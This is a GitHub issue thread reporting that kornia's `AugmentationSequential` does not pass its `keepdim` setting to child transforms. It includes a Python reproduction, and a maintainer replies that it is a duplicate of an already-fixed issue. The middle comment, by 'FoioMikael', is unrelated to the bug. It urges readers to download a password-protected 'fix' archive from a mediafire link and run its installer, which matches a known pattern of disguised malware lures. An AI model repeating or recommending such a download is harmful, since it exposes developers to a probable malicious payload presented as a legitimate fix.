### ISSUE TITLE
keep_dim takes no effect in AugmentationSequential

### ISSUE THREAD

**Issue by amaissen** [kornia/kornia#2997]
### Describe the bug

The class `AugmentationSequential` accepts the `keepdim` argument, which is useful when transforming single samples. However, when passing `keepdim=True` , the `keepdim` property of the underlying transformations is not overwritten. 

### Reproduction steps
Here is a minimal working example to reproduce the bug:
```python
from kornia.augmentation import Resize, AugmentationSequential

t = AugmentationSequential(
    Resize(size=(128, 128), keepdim=False),
    data_keys=None,
    keepdim=True,
)
print(list(t.children())[0].keepdim) # prints False
```

### Expected behavior

According to the documentation of `AugmentationSequential` one should expect that, the `keepdim` property of the underlying transformations is overwritten.

### Environment

```shell
- PyTorch Version (e.g., 1.0): 2.4.0
- OS (e.g., Linux): Ubuntu 22.04.3 LTS (x86_64
- How you installed PyTorch (`conda`, `pip`, source): pip
- Python version: 3.9.19
- CUDA/cuDNN version: 12.1
- Kornia: 0.7.3
```

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by johnnv1** [comment]
thanks for raising a issue, but its dup of #2848 -- already fixed on the main. On #2848 have a workaround for this too
